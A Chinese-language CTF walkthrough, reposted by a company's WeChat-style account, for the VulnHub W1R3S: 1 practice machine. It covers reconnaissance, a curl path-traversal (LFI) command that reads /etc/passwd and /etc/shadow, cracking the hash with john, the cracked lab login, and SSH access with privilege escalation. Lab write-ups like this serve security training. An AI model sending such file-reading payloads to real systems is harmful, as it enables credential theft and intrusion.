大数跨境

VulnHub-W1R3S: 1-Walkthrough打靶过程

VulnHub-W1R3S: 1-Walkthrough打靶过程 河北镌远网络科技有限公司
2023-11-03
1
导读:VulnHub-W1R3S: 1-Walkthrough打靶过程




VulnHub-W1R3S: 1-Walkthrough打靶过程





靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220

靶机难度:中级(CTF)

靶机发布日期:2018年2月5日

目标:得到root权限&找到flag.tx



一、信息收集

开启靶机之后先扫一下内网IP找到靶机IP

arp-scan -l

得知靶机ip为192.168.254.133

使用nmap扫描一下端口


先去看一下80端口

看了一圈没有什么有用的信息,先用dirb爆破一下目录

dirb http://192.168.254.133

捕捉到几个有用的网址我们试一下


二、漏洞检测

搜索一下cms是否存在可以利用的漏洞

地址:https://www.exploit-db.com/exploits/25971


根据上面的方法,发现读取不到

那就使用curl来利用LFI漏洞获取/etc/passwd/文件

找到了一个w1r3s,然后同样的方法读取/etc/shadow

curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://ip/administrator/alerts/alertConfigField.php

找到了密码我们使用john来破解


用户名:w1r3s

密码:computer

之前扫描到的22端口我们登录一下

尝试提权

提权完成查看flag

文章来源:csdn

版权归原作者所有,如有侵权,请联系删除

为网络安全保驾护航
为网络安全勇往直前

如果我们的文章对你有帮助,就把我们“设为星标”吧!

↓↓

3秒加星标,这样就不容易错过文章推送啦!


往期回顾

一次持续的邮件钓鱼攻击的简单溯源分析
联想超70款笔记本电脑被曝新型UEFI固件漏洞



请长按下方图片

识别二维码 关注河北镌远

为客户创造价值

与客户共同成长








【声明】内容源于网络
0
0
河北镌远网络科技有限公司
河北镌远网络科技有限公司是一家集人才、经验、技术于一体的,提供全面系统集成解决方案的专业IT服务商。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。
内容 582
粉丝 0
河北镌远网络科技有限公司 河北镌远网络科技有限公司是一家集人才、经验、技术于一体的,提供全面系统集成解决方案的专业IT服务商。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。
总阅读554
粉丝0
内容582